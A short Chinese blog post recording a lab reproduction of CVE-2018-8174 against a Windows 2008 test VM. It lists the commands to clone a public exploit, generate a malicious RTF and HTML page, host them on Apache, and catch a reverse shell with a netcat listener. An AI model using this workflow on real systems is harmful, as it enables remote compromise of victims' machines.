CVE-2018-8174双杀漏洞复现总结

8 篇文章 0 订阅
3 篇文章 0 订阅

CVE-2018-8174双杀漏洞复现总结

记录一下CVE-2018-8174双杀漏洞的复现过程~

漏洞原理

环境说明

  • 攻击机:kali
  • 靶机:windows2008

漏洞复现

  1. 在kali上下载exp
    https://github.com/Yt1g3r/CVE-2018-8174_EXP.git
    也可以下载到本地 手动上传到kali上去
  2. 进入exp目录,生成payload
    cd CVE-2018-8174_EXP-master
    python CVE-2018-8174.py -u http://#{kali的ip}/ -o exp.rtf -i #{kali的ip} -p 4444
    (其中各个参数的说明:-u是设置url地址;-o表示输出文件;-i表示设置监听地址;-p表示设置监听端口)
    在这里插入图片描述
  3. 把 explot.html 复制到 /var/www/html目录下,并开启 apache 服务
cp exploit.html /var/www/html/

cp exp.rtf /var/www/html/

service apache2 start
  1. 在kali上开启监听
    nc -lvvp 4444

  2. 在靶机上访问目标网页,kali端即可收到反弹过来的shell
    http://#{攻击机ip}/exploit.html

至此就可以复现成功啦~

  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值